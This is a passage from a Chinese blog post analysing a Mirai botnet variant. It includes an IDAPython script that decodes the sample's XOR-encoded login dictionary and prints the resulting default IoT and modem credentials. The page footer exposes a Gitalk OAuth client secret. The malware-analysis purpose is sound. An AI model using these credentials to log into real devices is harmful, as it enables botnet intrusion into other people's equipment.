<li>根据样本的解密逻辑对字典进行解密<br>硬编码的解密字典可以在<code>scanner_init</code>函数中获取，只需要分析<code>add_auth_entry</code>函数的传参就可以得到。<br><img src="/images/Pastedimage20221226183019.png" alt="undifined"><br>对于解密逻辑，可以在函数<code>add_auth_entry</code>中得到，可以看到<code>deobf</code>函数已经被编译优化了，但是我们依旧可以看到解密逻辑仅仅是使用了简单的xor操作，对<code>enc_user</code>或<code>enc_pass</code>逐个字节xor<code>0xEA</code>。<br><img src="/images/Pastedimage20221226182849.png" alt="undifined"><br>因此可以对应写出字典提取的IDAPython脚本如下，大致逻辑依旧是从<code>scanner_init</code>函数地址空间中分析<code>add_auth_entry</code>的传参，获取到硬编码的字典，然后对其进行解密：<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> idautils</span><br><span class="line"><span class="keyword">import</span> idc</span><br><span class="line"></span><br><span class="line">ea = idc.get_name_ea_simple(<span class="string">&quot;add_auth_entry&quot;</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;code refers to 0x%x&quot;</span> % ea)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 分析函数传参</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">find_args</span>(<span class="params">addr</span>):</span><br><span class="line">    <span class="comment"># 在当前addr和当前函数范围之间</span></span><br><span class="line">    start = idc.get_func_attr(addr, idc.FUNCATTR_START)</span><br><span class="line">    each_op = addr</span><br><span class="line">    tmp_args = &#123;</span><br><span class="line">        <span class="string">&quot;R0&quot;</span> : <span class="number">0</span>,</span><br><span class="line">        <span class="string">&quot;R1&quot;</span> : <span class="number">0</span>,</span><br><span class="line">        <span class="string">&quot;R2&quot;</span> : <span class="number">0</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">while</span> each_op &gt;= start:</span><br><span class="line">        op_diasm = idc.GetDisasm(each_op)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;LDR&quot;</span> <span class="keyword">in</span> op_diasm:</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;R0&quot;</span> <span class="keyword">in</span> op_diasm <span class="keyword">and</span> tmp_args[<span class="string">&quot;R0&quot;</span>] == <span class="number">0</span>:</span><br><span class="line">                tmp_args[<span class="string">&quot;R0&quot;</span>] = each_op</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;R1&quot;</span> <span class="keyword">in</span> op_diasm <span class="keyword">and</span> tmp_args[<span class="string">&quot;R1&quot;</span>] == <span class="number">0</span>:</span><br><span class="line">                tmp_args[<span class="string">&quot;R1&quot;</span>] = each_op</span><br><span class="line">            <span class="comment"># if &quot;R2&quot; in op_diasm and tmp_args[&quot;R2&quot;] == 0:</span></span><br><span class="line">            <span class="comment">#     tmp_args[&quot;R2&quot;] = hex(each_op)</span></span><br><span class="line">        <span class="keyword">if</span> tmp_args[<span class="string">&quot;R0&quot;</span>] !=<span class="number">0</span> <span class="keyword">and</span> tmp_args[<span class="string">&quot;R1&quot;</span>] != <span class="number">0</span> :<span class="comment"># and tmp_args[&quot;R2&quot;] != 0:</span></span><br><span class="line">            <span class="keyword">return</span> tmp_args</span><br><span class="line">        each_op = idc.prev_head(each_op)</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 获取硬编码的字典数据并解密</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_op_string</span>(<span class="params">addr</span>):</span><br><span class="line">    str_addr_list = <span class="built_in">list</span>(idautils.DataRefsFrom(addr))</span><br><span class="line">    data = <span class="string">&quot;&quot;</span></span><br><span class="line">    start = str_addr_list[<span class="number">1</span>]</span><br><span class="line">    i = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        byte = idc.get_wide_byte(start + i)</span><br><span class="line">        <span class="keyword">if</span> byte == <span class="number">0</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        data += <span class="built_in">chr</span>(byte ^ <span class="number">0xEA</span>)</span><br><span class="line">        i += <span class="number">1</span></span><br><span class="line">    <span class="comment"># print(&quot;0x%x&quot; % start, data)</span></span><br><span class="line">    <span class="keyword">return</span> data</span><br><span class="line"></span><br><span class="line"><span class="comment"># 解密</span></span><br><span class="line"><span class="keyword">for</span> addr <span class="keyword">in</span> idautils.CodeRefsTo(ea, <span class="number">0</span>):</span><br><span class="line">    <span class="comment"># print(&quot;call func at %s&quot; % hex(addr))</span></span><br><span class="line">    args = find_args(addr)</span><br><span class="line">    arg0 = get_op_string(args[<span class="string">&quot;R0&quot;</span>])</span><br><span class="line">    arg1 = get_op_string(args[<span class="string">&quot;R1&quot;</span>])</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;name: %s&quot;</span> % arg0)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;pass: %s&quot;</span> % arg1)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;\n&quot;</span>)</span><br></pre></td></tr></table></figure>
解密结果如下：<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br></pre></td><td class="code"><pre><span class="line">name: root</span><br><span class="line">pass: Fireitup</span><br><span class="line"></span><br><span class="line">name: root</span><br><span class="line">pass: Pon521</span><br><span class="line"></span><br><span class="line">name: telecomadmin:nE</span><br><span class="line">pass: jA%5m</span><br><span class="line"></span><br><span class="line">name: telnetadmin</span><br><span class="line">pass: jA%5m</span><br><span class="line"></span><br><span class="line">name: telecomadmin</span><br><span class="line">pass: admintelecom</span><br><span class="line"></span><br><span class="line">name: ftp</span><br><span class="line">pass: admintelecom</span><br><span class="line"></span><br><span class="line">name: user</span><br><span class="line">pass: admintelecom</span><br><span class="line"></span><br><span class="line">name: guest</span><br><span class="line">pass: admintelecom</span><br><span class="line"></span><br><span class="line">name: root</span><br><span class="line">pass: icatch99</span><br><span class="line"></span><br><span class="line">name: root</span><br><span class="line">pass: vizxv</span><br><span class="line"></span><br><span class="line">name: root</span><br><span class="line">pass: </span><br><span class="line"></span><br><span class="line">name: guest</span><br><span class="line">pass: 12345</span><br><span class="line"></span><br><span class="line">name: root</span><br><span class="line">pass: tsgoingon</span><br><span class="line"></span><br><span class="line">name: admin</span><br><span class="line">pass: tsgoingon</span><br><span class="line"></span><br><span class="line">name: default</span><br><span class="line">pass: tsgoingon</span><br><span class="line"></span><br><span class="line">name: default</span><br><span class="line">pass: OxhlwSG8</span><br><span class="line"></span><br><span class="line">name: daemon</span><br><span class="line">pass: OxhlwSG8</span><br><span class="line"></span><br><span class="line">name: root</span><br><span class="line">pass: solokey</span><br><span class="line"></span><br><span class="line">name: default</span><br><span class="line">pass: lJwpbo6</span><br><span class="line"></span><br><span class="line">name: root</span><br><span class="line">pass: lJwpbo6</span><br><span class="line"></span><br><span class="line">name: default</span><br><span class="line">pass: tlJwpbo6</span><br><span class="line"></span><br><span class="line">name: default</span><br><span class="line">pass: </span><br><span class="line"></span><br><span class="line">name: guest</span><br><span class="line">pass: 123456</span><br><span class="line"></span><br><span class="line">name: default</span><br><span class="line">pass: S2fGqNFs</span><br><span class="line"></span><br><span class="line">name: support</span><br><span class="line">pass: S2fGqNFs</span><br><span class="line"></span><br><span class="line">name: admin</span><br><span class="line">pass: 1234</span><br><span class="line"></span><br><span class="line">name: root</span><br><span class="line">pass: admin</span><br><span class="line"></span><br><span class="line">name: bin</span><br><span class="line">pass: admin</span><br><span class="line"></span><br><span class="line">name: default</span><br><span class="line">pass: 1cDuLJ7c</span><br><span class="line"></span><br><span class="line">name: root</span><br><span class="line">pass: 123456</span><br><span class="line"></span><br><span class="line">name: root</span><br><span class="line">pass: 1001chin</span><br><span class="line"></span><br><span class="line">name: bin</span><br><span class="line">pass: </span><br><span class="line"></span><br><span class="line">name: root</span><br><span class="line">pass: Zte521</span><br></pre></td></tr></table></figure></li>
</ol>
<h2 id="其他的一些有趣地方"><a href="#其他的一些有趣地方" class="headerlink" title="其他的一些有趣地方"></a>其他的一些有趣地方</h2><p>在mirai源码中，进程隐藏是向<code>argv[0]</code>写入随机字符串，以及使用<code>ptctl</code>修改进程名的方式来进行的。该样本是直接将进程名修改为一个静态的字符串<code>/var/Sofia</code>。经过调研，<code>/var/Sofia</code>似乎是某些IoT设备的视频应用程序，但明显不是本次应急设备的，因此猜测该样本还正在处于不断的开发调试中（毕竟连调试信息都没去除）。<br><img src="/images/Pastedimage20221226184625.png" alt="undifined"><br>从弱口令字典中可以看出，该样本应该是针对国内某些设备的，因为字典中包含的弱口令有几个是中国电信的光猫设备的常见默认密码。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/11/30/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9A%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" rel="prev" title="mirai源码分析：运行环境搭建">
      <i class="fa fa-chevron-left"></i> mirai源码分析：运行环境搭建
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/12/23/mirai%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90%EF%BC%9Abot%E5%88%86%E6%9E%90/" rel="next" title="mirai源码分析：bot分析">
      mirai源码分析：bot分析 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="gitalk-container"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#CNC%E5%9B%9E%E8%BF%9E%E5%9C%B0%E5%9D%80"><span class="nav-number">1.</span> <span class="nav-text">CNC回连地址</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BA%90%E7%A0%81%E8%A7%A3%E6%9E%90"><span class="nav-number">1.1.</span> <span class="nav-text">源码解析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A0%B7%E6%9C%AC%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90"><span class="nav-number">1.2.</span> <span class="nav-text">样本静态分析</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%BC%B1%E5%8F%A3%E4%BB%A4%E5%AD%97%E5%85%B8"><span class="nav-number">2.</span> <span class="nav-text">弱口令字典</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BA%90%E7%A0%81%E8%A7%A3%E6%9E%90-1"><span class="nav-number">2.1.</span> <span class="nav-text">源码解析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%9D%99%E6%80%81%E5%88%86%E6%9E%90"><span class="nav-number">2.2.</span> <span class="nav-text">静态分析</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%85%B6%E4%BB%96%E7%9A%84%E4%B8%80%E4%BA%9B%E6%9C%89%E8%B6%A3%E5%9C%B0%E6%96%B9"><span class="nav-number">3.</span> <span class="nav-text">其他的一些有趣地方</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">OneShell</p>
  <div class="site-description" itemprop="description">ToT</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">55</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">15</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">OneShell</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : 'd364449d44c374dab007',
      clientSecret: 'bb821aa84a81e3bd904d059c6e9ec7eb0e1cab4f',
      repo        : 'BlogComments',
      owner       : 'NoneShell',
      admin       : ['NoneShell'],
      id          : '2093a6301599d9b8e15d32e0017f5b71',
        language: 'zh-CN',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
